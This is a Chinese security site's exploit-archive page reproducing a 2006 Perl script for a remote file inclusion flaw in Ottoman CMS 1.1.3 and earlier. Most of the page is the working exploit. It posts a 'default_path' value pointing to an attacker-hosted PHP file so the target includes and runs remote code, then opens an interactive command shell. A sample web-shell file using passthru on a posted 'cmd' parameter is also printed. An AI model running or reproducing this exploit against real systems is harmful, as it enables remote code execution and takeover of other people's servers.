首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ottoman CMS <= 1.1.3 (default_path) Remote File Inclusion Exploit
来源:jacekwlo[at]gmail[dot]com 作者:Jacek 发布时间:2006-07-10  

#!/usr/bin/perl
use IO::Socket;


################################################################################
# #
# Jacek Wlodarczyk (j4ck) - jacekwlo[at]gmail[dot]com #
# #
################################################################################


#Title: Ottoman CMS <= 1.1.3 Remote File Inclusion Exploit
#Application: Ottoman Content Management System
#Version: 1.1.3 and prior
#Url: http://www.lowter.com/p/ottoman

#Affected software description:

#Input passed to the "default_path" parameter in "index.php", "error.php", "classes/main_class.php", "format_css.php", "js.php",
#and "rss.php" is not properly sanitized before being used to include files.
#Vulnerable scripts not properly sanitizing user-supplied input to the 'POST' and 'COOKIE' variables.
#This can be exploited to execute arbitrary PHP code by including files from local or external resources.
#Exploitation requires turn ON "register_globals"

#PoC Exploit (POST method):

if (@ARGV ne 4)
{
&usage;
}


sub usage()
{
print "\r\n (c) Jacek Wlodarczyk (j4ck)\r\n\r\n";
print "- Exploit for Ottoman CMS <= 1.1.3\r\n\r\n";
print "- Usage: $0 <target> <script location> <shell location> <shell variable>\r\n";
print "- <target> -> Victim's target eg: http://www.victim.com\r\n";
print "- <script location> -> Path to script eg: /ottoman/error.php\r\n";
print "- <cmd shell location> -> eg: http://www.site.com/sh_dir/\r\n";
print "- <cmd shell variable> -> eg: cmd\r\n\r\n";
print "- Eg: http://127.0.0.1 /ottoman_v1.1.3/index.php http://10.0.0.10/sh_dir/ cmd\r\n\r\n";
exit();
}


$HOST = $ARGV[0];
$DIR = $ARGV[1];
$INC_FILE = $ARGV[2];
$CMD = $ARGV[3];
$COMMAND = '';

print "\r\nATTACKING : ".$HOST.$DIR."\r\n\r\n";
$HOST =~ s/(http:\/\/)//;

while()
{

print "[shell] \$";
chomp($COMMAND = <STDIN>);
if ($COMMAND eq "q")
{
exit;
}

if (!$COMMAND)
{
print "\nPlease Enter a Command\n\n";
next;
}


$data="default_path=".$INC_FILE."&".$CMD."=".$COMMAND;
$post = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "Error 404\r\n\r\n";

print $post "POST ".$DIR." HTTP/1.1\r\n";
print $post "Host: ".$HOST."\r\n";
print $post "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4\r\n";
print $post "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
print $post "Accept-Language: en-us;q=0.7,en;q=0.3\r\n";
print $post "Accept-Encoding: gzip,deflate\r\n";
print $post "Connection: Keep-Alive\r\n";
print $post "Keep-Alive: 300\r\n";
print $post "Cache-Control: no-cache\r\n";
print $post "Content-Type: application/x-www-form-urlencoded\r\n";
print $post "Content-Length: ".length($data)."\r\n";
print $post "Connection: close\r\n\r\n";
print $post $data."\r\n";

while ($ans = <$post>)
{
if ($ans =~ /404/ )
{
printf "\n\nFile ".$ARGV[1]." no exists.\r\n\r\n";
exit;
}
printf $ans;
}

}
exit;


#Shell example:

#config.php
#------cut---------------
#<?
#passthru($_POST['cmd']);
#?>
#------cut---------------



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Webmin < 1.290 / Usermin &l
·Microsoft Word 2000/2003 Hlink
·PAPOO <= 3_RC3 SQL Injectio
·SipXtapi SIP Remote Buffer Ove
·WinRAR <= 3.60 beta 6 (SFX
·EJ3 TOPo 2.2 (descripcion) Rem
·Pivot <= 1.30 RC2 Privilege
·Linux Kernel 2.6.13 <= 2.6.
·MS Internet Explorer 6 (Intern
·Linux Kernel 2.6.13 <= 2.6.
·Microsoft Excel 2003 Hlink Loc
·Linux Kernel 2.6.13 <= 2.6.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved